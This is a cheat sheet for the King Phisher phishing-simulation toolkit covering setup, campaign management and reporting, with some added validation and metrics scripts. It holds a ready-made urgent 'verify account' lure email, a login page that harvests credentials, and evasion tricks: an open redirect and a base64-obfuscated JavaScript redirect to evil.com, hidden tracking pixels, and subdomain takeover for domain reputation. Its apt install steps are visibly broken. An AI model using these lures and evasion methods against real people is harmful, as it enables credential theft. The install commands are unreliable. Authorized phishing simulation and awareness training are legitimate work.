# King Phisher Social Engineering Toolkit Cheat Sheet

## Overview

King Phisher is a professional-grade phishing campaign toolkit developed by RSM US LLP for testing and promoting user awareness by simulating real-world phishing attacks. It provides a complete framework for creating, managing and analysing phishing campaigns, with advanced reporting capabilities.

Warning: This tool is intended for authorized security testing and awareness training only. Make sure you have proper authorization before conducting any phishing campaign.

## Installation

### Ubuntu/Debian Installation

```bash
# Add King Phisher repository
wget -q https://github.com/rsmusllp/king-phisher/raw/master/data/client/king_phisher_icon.ico
echo 'deb https://github.com/rsmusllp/king-phisher/raw/master/data/server/king_phisher_server.py /' | sudo tee /etc/apt/sources.list.d/king-phisher.list

# Install via package manager
sudo apt update
sudo apt install king-phisher

# Manual installation
git clone https://github.com/rsmusllp/king-phisher.git
cd king-phisher
sudo ./tools/install.sh
```

### CentOS/RHEL Installation

```bash
# Install dependencies
sudo yum install python3 python3-pip git

# Clone repository
git clone https://github.com/rsmusllp/king-phisher.git
cd king-phisher

# Install Python dependencies
pip3 install -r requirements.txt

# Install King Phisher
sudo ./tools/install.sh
```

### Docker Installation

```bash
# Build Docker image
git clone https://github.com/rsmusllp/king-phisher.git
cd king-phisher
docker build -t king-phisher .

# Run King Phisher server
docker run -it -p 80:80 -p 443:443 king-phisher
```

## Basic Usage

### Starting the King Phisher Server

```bash
# Start server with default configuration
sudo king-phisher-server

# Start with custom configuration
sudo king-phisher-server -c /path/to/config.yml

# Start with specific interface
sudo king-phisher-server -a 0.0.0.0

# Start with custom port
sudo king-phisher-server -p 8080
```

### Launching the King Phisher Client

```bash
# Start GUI client
king-phisher-client

# Connect to remote server
king-phisher-client --server https://server.com

# Use specific configuration
king-phisher-client --config /path/to/client_config.json
```

## Configuration

### Server Configuration (server_config.yml)

```yaml
# Basic server configuration
server:
  bind:
    host: 0.0.0.0
    port: 80
  ssl:
    enabled: true
    host: 0.0.0.0
    port: 443
    cert: /path/to/cert.pem
    key: /path/to/key.pem

# Database configuration
database:
  driver: postgresql
  host: localhost
  port: 5432
  database: king_phisher
  username: king_phisher
  password: password

# Email configuration
email:
  smtp:
    host: smtp.gmail.com
    port: 587
    username: your-email@gmail.com
    password: app-password
    use_tls: true

# Logging configuration
logging:
  level: INFO
  file: /var/log/king-phisher.log
```

### Client Configuration

```json
{
  "server": "https://king-phisher.local",
  "server_username": "username",
  "server_use_ssl": true,
  "server_verify_ssl": false,
  "gui": {
    "show_campaign_graph": true,
    "show_campaign_map": true
  }
}
```

## Campaign Management

### Creating Campaigns

A campaign is built from five components:

1. Email template
2. Landing page
3. Target list
4. SMTP configuration
5. Campaign settings

### Email Templates

```html
<!DOCTYPE html>
<html>
<head>
  <meta charset="UTF-8">
  <title>Security Alert</title>
  <style>
    body { font-family: Arial, sans-serif; margin: 20px; }
    .header { background: #d32f2f; color: white; padding: 10px; }
    .content { padding: 20px; }
    .button { background: #1976d2; color: white; padding: 10px 20px; text-decoration: none; }
  </style>
</head>
<body>
  <div class="header">
    <h2>Security Alert - Immediate Action Required</h2>
  </div>
  <div class="content">
    <p>Dear {{ client.first_name }} {{ client.last_name }},</p>
    <p>We have detected suspicious activity on your account associated with {{ client.email_address }}.</p>
    <p>Please verify your account immediately to prevent suspension.</p>
    <p><a href="{{ url.webserver }}" class="button">Verify Account Now</a></p>
    <p>This link will expire in 24 hours.</p>
    <p>Best regards,<br>IT Security Team</p>
  </div>
</body>
</html>
```

### Landing Pages

```html
<!DOCTYPE html>
<html>
<head>
  <meta charset="UTF-8">
  <title>Account Verification</title>
  <style>
    body { font-family: Arial, sans-serif; background: #f5f5f5; margin: 0; padding: 50px; }
    .container { max-width: 400px; margin: auto; background: white; padding: 30px; border-radius: 5px; box-shadow: 0 2px 10px rgba(0,0,0,0.1); }
    input { width: 100%; padding: 12px; margin: 10px 0; border: 1px solid #ddd; border-radius: 3px; }
    button { width: 100%; background: #1976d2; color: white; padding: 12px; border: none; border-radius: 3px; cursor: pointer; }
    .logo { text-align: center; margin-bottom: 30px; }
  </style>
</head>
<body>
  <div class="container">
    <div class="logo">
      <h2>Account Verification</h2>
    </div>
    <form method="post" action="{{ url.webserver }}">
      <input type="hidden" name="rid" value="{{ client.uid }}">
      <input type="text" name="username" placeholder="Username or Email" required>
      <input type="password" name="password" placeholder="Password" required>
      <button type="submit">Verify Account</button>
    </form>
    <p style="font-size: 12px; color: #666; text-align: center; margin-top: 20px;">
      This verification is required to maintain account security.
    </p>
  </div>
</body>
</html>
```

### Target Lists

```csv
# CSV format for target import
first_name,last_name,email_address,department,company
John,Doe,john.doe@company.com,IT,Acme Corp
Jane,Smith,jane.smith@company.com,HR,Acme Corp
Bob,Johnson,bob.johnson@company.com,Finance,Acme Corp
Alice,Williams,alice.williams@company.com,Marketing,Acme Corp
```
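Before a target list is imported it is worth validating it: a malformed address wastes a send, a duplicate inflates the statistics, and an address outside the agreed scope is an authorization problem. The loader below is an added example (not part of the original cheat sheet or of King Phisher); the CSV text is constructed to match the header above, and the allowed-domain list stands in for the engagement's authorized scope.

```python
"""Load a King Phisher-style target CSV and validate it before import.

Added example, not part of the original cheat sheet or the King Phisher
project.  SAMPLE_CSV is constructed to match the header shown above; the
allowed-domain list is an assumption standing in for the authorized scope.
"""
import csv
import io
import re

REQUIRED_COLUMNS = ("first_name", "last_name", "email_address")
# Local part, '@', then a domain containing at least one dot
EMAIL_RE = re.compile(r"^[^@\s]+@([^@\s]+\.[^@\s]+)$")

# Constructed sample: two good rows, a duplicate (case differs), a malformed
# address, and a domain outside the scope
SAMPLE_CSV = """first_name,last_name,email_address,department,company
John,Doe,john.doe@company.com,IT,Acme Corp
Jane,Smith,jane.smith@company.com,HR,Acme Corp
Jane,Smith,JANE.SMITH@company.com,HR,Acme Corp
Bob,Johnson,bob.johnson@company,Finance,Acme Corp
Eve,Outsider,eve@partner.example,Sales,Partner Ltd
"""


def load_targets(csv_text, allowed_domains):
    """Return (accepted_rows, rejections).

    A row is rejected when its address is malformed, its domain is not in
    the authorized scope, or it repeats an address already accepted
    (compared case-insensitively).  Each rejection records the CSV line
    number and the reason, so the operator can show exactly who was and
    was not emailed.
    """
    reader = csv.DictReader(io.StringIO(csv_text))
    missing = [c for c in REQUIRED_COLUMNS if c not in (reader.fieldnames or [])]
    if missing:
        raise ValueError(f"target list is missing columns: {missing}")

    allowed = {d.lower() for d in allowed_domains}
    seen, accepted, rejections = set(), [], []
    for line_no, row in enumerate(reader, start=2):  # line 1 is the header
        email = (row.get("email_address") or "").strip()
        match = EMAIL_RE.match(email)
        if not match:
            rejections.append((line_no, email, "malformed address"))
            continue
        domain = match.group(1).lower()
        if domain not in allowed:
            rejections.append((line_no, email, f"domain {domain} not in authorized scope"))
            continue
        key = email.lower()
        if key in seen:
            rejections.append((line_no, email, "duplicate address"))
            continue
        seen.add(key)
        row["email_address"] = key  # normalise so later joins on address work
        accepted.append(row)
    return accepted, rejections


if __name__ == "__main__":
    ok, bad = load_targets(SAMPLE_CSV, ["company.com"])
    print(f"accepted {len(ok)} target(s)")
    for line_no, email, reason in bad:
        print(f"line {line_no}: {email!r} rejected: {reason}")
```

Run against the sample, two rows are accepted and three are rejected with a reason each; feeding the accepted rows to the import keeps the campaign inside the scope that was signed off.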
## Advanced Features

### Template Variables

```
{{ client.first_name }}
{{ client.last_name }}
{{ client.email_address }}
{{ client.company_name }}
{{ client.department }}
{{ url.webserver }}
{{ url.tracking_image }}
{{ time.local }}
{{ time.utc }}
```

### Custom Fields

```python
# Add custom fields to campaigns
custom_fields = {
    'employee_id': 'EMP001',
    'manager': 'John Manager',
    'location': 'New York Office',
    'security_level': 'Standard'
}
```

### Plugins and Extensions

```python
# King Phisher client plugin structure
from king_phisher.client import plugins


class CustomPlugin(plugins.ClientPlugin):
    authors = ['Your Name']
    title = 'Custom Plugin'
    description = 'Custom functionality for King Phisher'
    version = '1.0'

    def initialize(self):
        # Plugin initialization code; return True to signal success
        return True

    def finalize(self):
        # Plugin cleanup code
        pass
```

## Reporting and Analytics

### Campaign Statistics

```python
# Access campaign data via the RPC API
import king_phisher.client.client_rpc as client_rpc

# Connect to server
rpc = client_rpc.KingPhisherRPCClient(
    ('server.com', 443),
    username='admin',
    password='password',
    use_ssl=True
)

# Get campaign statistics
campaign_id = 1
stats = rpc.remote_table_row('campaigns', campaign_id)
# remote_table yields rows lazily, so materialise the results before counting
messages = list(rpc.remote_table('messages', query_filter={'campaign_id': campaign_id}))
visits = list(rpc.remote_table('visits', query_filter={'campaign_id': campaign_id}))
credentials = list(rpc.remote_table('credentials', query_filter={'campaign_id': campaign_id}))

print(f"Messages sent: {len(messages)}")
print(f"Visits: {len(visits)}")
print(f"Credentials harvested: {len(credentials)}")
```
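Raw row counts overstate a campaign's result: one recipient who clicks twice adds two visits, and a mail gateway that follows links before delivery adds visits that match no real click. The example below (added here, not part of the original cheat sheet or of King Phisher) computes per-target funnel numbers and separates visits that cannot be tied to a sent message; it also buckets visits per hour, which is the grouping the timeline section further down plots. The rows are constructed, and the column names `id`, `message_id`, `target_email` and `visit_time` are assumptions about the table layout.

```python
"""Per-target funnel metrics for a campaign from message/visit/credential rows.

Added example, not part of the original cheat sheet or of King Phisher.
The rows are constructed; the column names 'id', 'message_id',
'target_email' and 'visit_time' are assumptions about the table layout.
"""
import datetime
from collections import Counter

# Constructed sample: four messages, one recipient clicking twice and
# submitting twice, one clicking once, and one visit with an unknown id
MESSAGES = [
    {"id": "m1", "campaign_id": 1, "target_email": "john.doe@company.com"},
    {"id": "m2", "campaign_id": 1, "target_email": "jane.smith@company.com"},
    {"id": "m3", "campaign_id": 1, "target_email": "bob.johnson@company.com"},
    {"id": "m4", "campaign_id": 1, "target_email": "alice.williams@company.com"},
]
VISITS = [
    {"message_id": "m1", "visitor_ip": "203.0.113.10", "visit_time": "2024-03-01T09:05:00"},
    {"message_id": "m1", "visitor_ip": "203.0.113.10", "visit_time": "2024-03-01T09:07:00"},
    {"message_id": "m2", "visitor_ip": "198.51.100.7", "visit_time": "2024-03-01T09:30:00"},
    {"message_id": "m9", "visitor_ip": "192.0.2.1", "visit_time": "2024-03-01T10:00:00"},
]
CREDENTIALS = [
    {"message_id": "m1", "username": "john.doe", "submitted": "2024-03-01T09:08:00"},
    {"message_id": "m1", "username": "john.doe", "submitted": "2024-03-01T09:09:00"},
]


def campaign_funnel(messages, visits, credentials):
    """Return funnel numbers keyed on distinct recipients, not raw events.

    Deduplicating on message_id answers 'how many recipients clicked or
    submitted', and visits whose message_id matches no sent message are
    counted separately so they can be investigated (link scanners,
    forwarded mail) instead of inflating the click rate.
    """
    sent_ids = {m["id"] for m in messages}
    clicked = {v["message_id"] for v in visits if v["message_id"] in sent_ids}
    unmatched = [v for v in visits if v["message_id"] not in sent_ids]
    submitted = {c["message_id"] for c in credentials if c["message_id"] in sent_ids}
    sent = len(sent_ids)
    return {
        "sent": sent,
        "raw_visits": len(visits),
        "unique_clicked": len(clicked),
        "unique_submitted": len(submitted),
        "click_rate": round(len(clicked) / sent, 3) if sent else 0.0,
        "submit_rate": round(len(submitted) / sent, 3) if sent else 0.0,
        "unmatched_visits": len(unmatched),
    }


def visits_per_hour(visits):
    """Bucket visits by hour; returns {ISO hour string: count}."""
    counts = Counter()
    for v in visits:
        hour = datetime.datetime.fromisoformat(v["visit_time"]).replace(
            minute=0, second=0, microsecond=0)
        counts[hour.isoformat()] += 1
    return dict(counts)


if __name__ == "__main__":
    for key, value in campaign_funnel(MESSAGES, VISITS, CREDENTIALS).items():
        print(f"{key}: {value}")
    for hour, n in sorted(visits_per_hour(VISITS).items()):
        print(f"{hour}  {n}")
```

On the sample, four raw visits become two distinct clickers (a 50% click rate) plus one unmatched visit to look at, and two credential rows become one recipient who submitted.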
### Geographic Analysis

```python
# Analyze visitor geographic data
import geoip2.database
import geoip2.errors


def analyze_visitor_locations(visits, db_path='/path/to/GeoLite2-City.mmdb'):
    """Count visits per "City, Country" using a local GeoLite2 City database."""
    locations = {}
    with geoip2.database.Reader(db_path) as reader:
        for visit in visits:
            try:
                response = reader.city(visit['visitor_ip'])
            except (geoip2.errors.AddressNotFoundError, ValueError):
                # Private or unrouted addresses are not in the database; skip them
                continue
            location = f"{response.city.name}, {response.country.name}"
            locations[location] = locations.get(location, 0) + 1
    return locations
```

### Timeline Analysis

```python
# Analyze campaign timeline
import datetime
import matplotlib.pyplot as plt


def plot_campaign_timeline(visits):
    timestamps = [datetime.datetime.fromisoformat(v['visit_time']) for v in visits]
    timestamps.sort()

    # Group by hour
    hourly_counts = {}
    for ts in timestamps:
        hour = ts.replace(minute=0, second=0, microsecond=0)
        hourly_counts[hour] = hourly_counts.get(hour, 0) + 1

    # Plot timeline
    hours = list(hourly_counts.keys())
    counts = list(hourly_counts.values())

    plt.figure(figsize=(12, 6))
    plt.plot(hours, counts, marker='o')
    plt.title('Campaign Activity Timeline')
    plt.xlabel('Time')
    plt.ylabel('Visits')
    plt.xticks(rotation=45)
    plt.tight_layout()
    plt.savefig('campaign_timeline.png')
```

## Security Features

### SSL/TLS Configuration

```bash
# Generate a self-signed SSL certificate
openssl req -newkey rsa:4096 -nodes -keyout king-phisher.key -x509 -days 365 -out king-phisher.crt

# Configure Let's Encrypt
certbot certonly --standalone -d yourdomain.com
```

### Authentication and Authorization

```yaml
# User authentication configuration
authentication:
  provider: pam  # or ldap, database

# LDAP configuration
ldap:
  server: ldap://ldap.company.com
  base_dn: dc=company,dc=com
  user_filter: (sAMAccountName={username})

# Database authentication
database_auth:
  table: users
  username_column: username
  password_column: password_hash
```

### Access Control

```python
# Role-based access control
user_permissions = {
    'admin': ['campaign.create', 'campaign.delete', 'user.manage'],
    'operator': ['campaign.create', 'campaign.view'],
    'viewer': ['campaign.view']
}
```

## API Integration

### REST API Usage

```python
# King Phisher REST API client
import requests


class KingPhisherAPI:
    def __init__(self, server_url, username, password):
        self.server_url = server_url.rstrip('/')
        self.session = requests.Session()
        self.authenticate(username, password)

    def authenticate(self, username, password):
        auth_data = {
            'username': username,
            'password': password
        }
        response = self.session.post(f"{self.server_url}/api/login", json=auth_data)
        response.raise_for_status()  # fail loudly instead of continuing unauthenticated
        return response.status_code == 200

    def get_campaigns(self):
        response = self.session.get(f"{self.server_url}/api/campaigns")
        response.raise_for_status()
        return response.json()

    def create_campaign(self, campaign_data):
        response = self.session.post(f"{self.server_url}/api/campaigns", json=campaign_data)
        response.raise_for_status()
        return response.json()

    def get_campaign_stats(self, campaign_id):
        response = self.session.get(f"{self.server_url}/api/campaigns/{campaign_id}/stats")
        response.raise_for_status()
        return response.json()
```

### Webhook Integration

```python
# Webhook for real-time notifications
from flask import Flask, request

app = Flask(__name__)


@app.route('/webhook', methods=['POST'])
def handle_webhook():
    data = request.get_json(silent=True) or {}
    event_type = data.get('event_type')

    if event_type == 'visit':
        # Handle website visit
        print(f"New visit from {data.get('visitor_ip')}")
    elif event_type == 'credentials':
        # Handle credential submission
        print(f"Credentials submitted: {data.get('username')}")

    return 'OK'


if __name__ == '__main__':
    app.run(host='0.0.0.0', port=5000)
```

## Evasion Techniques

### Email Evasion

```
From: IT Security <security@company-portal.com>
Subject: [Action Required] Account Security Verification

<a href="https://company-portal.com/redirect?url=https://evil.com">Click Here</a>
<img src="{{ url.tracking_image }}" style="display:none;width:1px;height:1px;">
```

### Domain Reputation

```
# Use aged domains
# Purchase expired domains with good reputation
# Use subdomain takeover techniques
# Implement proper SPF/DKIM/DMARC records

# Example SPF record
v=spf1 include:_spf.google.com ~all

# Example DKIM record
v=DKIM1; k=rsa; p=MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC...

# Example DMARC record
v=DMARC1; p=quarantine; rua=mailto:dmarc@company.com
```
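The SPF and DMARC records above express a policy, and the receiving side's behaviour depends on exactly which qualifier and tags they carry: `~all` only soft-fails unlisted senders, and `p=quarantine` still lets spoofed mail through to a junk folder. The parser below is an added example (not part of the original cheat sheet or of King Phisher) that a domain owner can run over their own TXT records to see what the policy actually enforces; it works on the record strings shown above plus constructed variants and performs no DNS lookups.

```python
"""Parse SPF and DMARC TXT records and list the weaknesses they leave open.

Added example, not part of the original cheat sheet or of King Phisher.
Operates on record strings only (no DNS queries); the sample records are
the ones shown above plus constructed variants.
"""
import re

# Mechanisms and modifiers that cost a DNS lookup under RFC 7208 (limit: 10)
LOOKUP_TERM_RE = re.compile(r"[+\-~?]?(include:|a\b|mx\b|redirect=|exists:)", re.IGNORECASE)


def parse_spf(record):
    """Return {'mechanisms': [...], 'all': qualifier} for a v=spf1 record, else None."""
    terms = record.split()
    if not terms or terms[0].lower() != "v=spf1":
        return None
    mechanisms, all_qualifier = [], None
    for term in terms[1:]:
        match = re.fullmatch(r"([+\-~?]?)all", term, re.IGNORECASE)
        if match:
            all_qualifier = match.group(1) or "+"  # no qualifier means pass
        else:
            mechanisms.append(term)
    return {"mechanisms": mechanisms, "all": all_qualifier}


def parse_dmarc(record):
    """Return the tag=value pairs of a v=DMARC1 record as a dict, else None."""
    tags = {}
    for part in record.split(";"):
        part = part.strip()
        if "=" not in part:
            continue
        key, value = part.split("=", 1)
        tags[key.strip().lower()] = value.strip()
    if tags.get("v", "").upper() != "DMARC1":
        return None
    return tags


def grade_domain(spf_record, dmarc_record):
    """Return findings a domain owner should act on; an empty list means strict policy."""
    findings = []

    spf = parse_spf(spf_record)
    if spf is None:
        findings.append("SPF: no valid v=spf1 record")
    else:
        if spf["all"] in (None, "+", "?"):
            findings.append("SPF: missing or permissive 'all' (use -all or ~all)")
        elif spf["all"] == "~":
            findings.append("SPF: softfail ~all; consider -all once senders are inventoried")
        lookups = [t for t in spf["mechanisms"] if LOOKUP_TERM_RE.match(t)]
        if len(lookups) > 10:
            findings.append("SPF: more than 10 DNS-lookup mechanisms (permerror per RFC 7208)")

    dmarc = parse_dmarc(dmarc_record)
    if dmarc is None:
        findings.append("DMARC: no valid v=DMARC1 record")
    else:
        policy = dmarc.get("p", "none")
        if policy == "none":
            findings.append("DMARC: p=none only monitors; spoofed mail is still delivered")
        elif policy == "quarantine":
            findings.append("DMARC: p=quarantine; p=reject blocks spoofing outright")
        if "rua" not in dmarc:
            findings.append("DMARC: no rua= address, so aggregate reports are lost")
        if dmarc.get("pct", "100") != "100":
            findings.append(f"DMARC: pct={dmarc['pct']} applies the policy to a sample only")
    return findings


if __name__ == "__main__":
    # The records from the cheat sheet above
    for finding in grade_domain("v=spf1 include:_spf.google.com ~all",
                                "v=DMARC1; p=quarantine; rua=mailto:dmarc@company.com"):
        print(finding)
```

On the page's own records the checker reports two findings (softfail SPF and a quarantine rather than reject policy); a `-all` / `p=reject` pair with a reporting address returns none.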
### Content Obfuscation

```html
<a href="https://evil.com">Verify Account</a>

<script>
  var encoded = "aHR0cHM6Ly9ldmlsLmNvbQ==";
  var decoded = atob(encoded);
  window.location.href = decoded;
</script>

<span style="display:none;">PHISHING</span>Legitimate<span style="display:none;">ATTACK</span> Content
```

## Troubleshooting

### Server Issues

```bash
# Check server status
sudo systemctl status king-phisher

# View server logs
sudo journalctl -u king-phisher -f

# Test server connectivity
curl -k https://localhost/ping

# Check database connection
sudo -u king-phisher psql -d king_phisher -c "SELECT version();"
```

### Email Delivery Issues

```bash
# Test SMTP configuration
python3 -c "
import smtplib
server = smtplib.SMTP('smtp.gmail.com', 587)
server.starttls()
server.login('user@gmail.com', 'password')
server.quit()
print('SMTP connection successful')
"

# Check DNS records
dig TXT company.com | grep spf
dig TXT _domainkey.company.com
dig TXT _dmarc.company.com

# Test email deliverability
echo 'Test email' | mail -s 'Test Subject' test@company.com
```

### SSL/TLS Issues

```bash
# Verify certificate
openssl x509 -in /path/to/cert.pem -text -noout

# Test SSL configuration
openssl s_client -connect domain.com:443 -servername domain.com

# Check certificate chain
curl -vI https://domain.com
```

### Performance Issues

```bash
# Monitor resource usage
top -p $(pgrep king-phisher)

# Check database performance
sudo -u postgres psql -d king_phisher -c "
SELECT schemaname, tablename, attname, n_distinct, correlation
FROM pg_stats
WHERE schemaname = 'public';
"

# Optimize database
sudo -u postgres psql -d king_phisher -c "VACUUM ANALYZE;"
```

## Resources

- [King Phisher official website](LINK_5)
- King Phisher documentation
- RSM US LLP Security
- [Phishing awareness training](LINK_5)
- Email security best practices

*This cheat sheet provides a comprehensive reference for using King Phisher. Always make sure you have proper authorization and follow ethical guidelines when conducting phishing simulations.*